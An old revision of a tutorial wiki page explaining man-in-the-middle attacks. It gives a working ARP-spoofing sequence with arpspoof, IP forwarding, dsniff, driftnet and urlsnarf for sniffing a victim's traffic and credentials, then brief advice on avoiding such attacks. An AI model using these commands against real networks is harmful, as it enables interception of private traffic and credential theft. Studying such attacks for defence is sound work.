This is an old revision of the document!
Table of Contents
Man in the middle attack
Man in the middle attack (also known as MITM) is a kind of attack in a way that attacker pretend the computer victim establishing a connection between victim and the AP. Then, the attacker forward any package from router to victim and viceversa so that anyone realizes that someone is just in the middle listening (and maybe sniffing) all the traffic between both sides.
In the moment someone is performing a MITM attack, he will be able to sniff all the traffic and then he can know everything about what we are doing on the Internet and, therefore, he will be able to get any credentials we use while we are surfing.
santi@kalibook:$ arpspoof -i wlan0 -t 192.168.1.12 192.168.1.254
santi@kalibook:$ arpspoof -i wlan0 -t 192.168.1.254 192.168.1.12
santi@kalibook:$ echo '1' > /proc/sys/net/ipv4/ip_forward
santi@kalibook:$ dsniff
santi@kalibook:$ driftnet -i wlan0
santi@kalibook:$ urlsnarf -i wlan0
santi@kalibook:$
santi@kalibook:$
santi@kalibook:$
santi@kalibook:$
How to prevent this kind of attack
As we have shown above, the easiest way to prevent this kind of attack if not to trust in non-secure connections specially if we are connected in an unknown AP. Probably if you are at home and your router is properly configured you can sleep peacefully because you know every device connected on it.
Maybe sometimes we need to surf in a non-secure website because we need some information but it doesn't matter if someone can see we are reading public information. The problem is when we log in in a non-secure website because someone can get our credentials (username and password) and, then, he has access to our private information (e-mail address, postal address, . . .). That's why we have to pay always attention at the address bar of our browser to see which kind of connection is using the website where we are surfing.
© 2017 Hacking Tony